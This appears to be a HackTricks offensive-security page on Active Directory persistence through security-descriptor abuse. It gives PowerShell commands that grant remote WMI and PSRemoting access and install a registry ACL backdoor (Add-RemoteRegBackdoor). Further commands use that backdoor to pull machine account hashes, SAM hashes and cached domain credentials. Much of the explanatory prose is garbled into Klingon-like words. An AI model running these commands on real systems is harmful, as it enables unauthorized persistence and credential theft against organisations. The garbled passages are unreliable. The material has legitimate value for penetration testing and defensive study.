hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
2024-02-10 17:52:19 +00:00

5.1 KiB
Raw Permalink Blame History

Security Descriptors

htARTE (HackTricks AWS Red Team Expert) !HackTricks!

Other ways to support HackTricks:

Security Descriptors

From the docs: Security Descriptor Definition Language (SDDL) defines the format which is used to describe a security descriptor. SDDL uses ACE strings for DACL and SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

The security descriptors are used to store the permissions an object has over an object. If you can just make a little change in the security descriptor of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.

Then, this persistence technique is based on the ability to win every privilege needed against certain objects, to be able to perform a task that usually requires admin privileges but without the need of being admin.

Access to WMI

You can give a user access to execute remotely WMI using this:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Qapla' WinRM

User using this: winrm PS console ghItlh.

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Remote access to hashes

QaStaHvIS registry ghItlh hashes ghItlh Reg backdoor DAMP vaj HarmJ0y/DAMP, vaj hash computer, SAM ghaH cached AD credential computer retrieve moment. So, Domain Controller computer regular user permission useful very 'e'.

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Check Silver Tickets to learn how you could use the hash of the computer account of a Domain Controller.

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: